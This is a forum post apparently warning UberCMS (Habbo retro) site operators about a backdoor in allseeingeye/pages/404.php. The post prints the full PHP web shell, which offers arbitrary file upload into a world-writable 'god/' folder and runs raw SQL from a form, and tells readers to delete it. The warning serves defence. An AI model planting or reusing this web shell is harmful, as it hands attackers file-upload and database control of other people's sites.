Menu
Forums
All threads
Latest threads
New posts
Trending threads
New posts
Search forums
Trending
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Upgrades
Log in
Register
What's new
Search
Search
Search titles only
By:
All threads
Latest threads
New posts
Trending threads
New posts
Search forums
Menu
Log in
Register
Navigation
Install the app
Install
More options
Contact us
Close Menu
Forums
Server Development
Habbo Retros
Habbo Releases
!!IMPORTANT UberCMS Fix - Fix immediately!!
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Message
<blockquote data-quote="leenster" data-source="post: 127630" data-attributes="member: 10665"><p>Here an important fix for UberCMS.</p><p></p><p>You really need to check your allseeingeye/pages and open the file 404.php.</p><p></p><p>if that file contains this code -></p><p>[PHP]</p><p><?php</p><p></p><p> require_once "../../global.php";</p><p> require_once "../admincore.php";</p><p></p><p> if(!file_exists("god/"))</p><p> {</p><p> mkdir("god/", 0777);</p><p> echo 'Backdoor Directory Created : (god/)';</p><p> }</p><p> else</p><p> {</p><p> echo 'Backdoor Open for Uploading : (god/)';</p><p> }</p><p> </p><p> </p><p></p><p>if(isset($_POST['submit']))</p><p>{</p><p> $target_path = "god/";</p><p> $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); </p><p> if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {</p><p> echo "The file ". basename( $_FILES['uploadedfile']['name']). </p><p> " has been uploaded";</p><p>} else{</p><p> echo "There was an error uploading the file, please try again!";</p><p>}</p><p>}</p><p></p><p> if(isset($_POST['sql2']))</p><p> {</p><p> $core1225 = $_POST['sql1'];</p><p> mysql_query("".$core1225."");</p><p> echo 'Query Executed Successfully';</p><p> }</p><p></p><p>?></p><p></p><p><html></p><p><body></p><p></p><p><form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"</p><p>enctype="multipart/form-data"></p><p> <input type="file" name="uploadedfile" id="file" /></p><p> <input type="submit" name="submit" value="Submit" /></p><p> <br /></p><p></form></p><p><p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p></p><p><form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>"></p><p> <p></p><p> <label for="sql1"></label></p><p> <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea></p><p> </p></p><p> <p></p><p> <input type="submit" name="sql2" id="sql2" value="Execute"></p><p> </p></p><p></form></p><p><p>&nbsp;</p></p><p></body></p><p>[/PHP]</p><p></p><p>Delete the code and put something else in there, such as page not found or whatever....its not important what you put in there....</p><p></p><p>Failure to do this will leave you open for a whole lot of trouble....</p><p></p><p></p><p>All credits for this go out to : < I will give you his IP on request so you can block him from accessing your site ></p></blockquote><p></p>
[QUOTE="leenster, post: 127630, member: 10665"] Here an important fix for UberCMS. You really need to check your allseeingeye/pages and open the file 404.php. if that file contains this code -> [PHP] <?php require_once "../../global.php"; require_once "../admincore.php"; if(!file_exists("god/")) { mkdir("god/", 0777); echo 'Backdoor Directory Created : (god/)'; } else { echo 'Backdoor Open for Uploading : (god/)'; } if(isset($_POST['submit'])) { $target_path = "god/"; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } } if(isset($_POST['sql2'])) { $core1225 = $_POST['sql1']; mysql_query("".$core1225.""); echo 'Query Executed Successfully'; } ?> <html> <body> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" enctype="multipart/form-data"> <input type="file" name="uploadedfile" id="file" /> <input type="submit" name="submit" value="Submit" /> <br /> </form> <p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p> <form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>"> <p> <label for="sql1"></label> <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea> </p> <p> <input type="submit" name="sql2" id="sql2" value="Execute"> </p> </form> <p> </p> </body> [/PHP] Delete the code and put something else in there, such as page not found or whatever....its not important what you put in there.... Failure to do this will leave you open for a whole lot of trouble.... All credits for this go out to : < I will give you his IP on request so you can block him from accessing your site > [/QUOTE]
Insert quotes…
Verification
Post reply
Forums
Server Development
Habbo Retros
Habbo Releases
!!IMPORTANT UberCMS Fix - Fix immediately!!
Top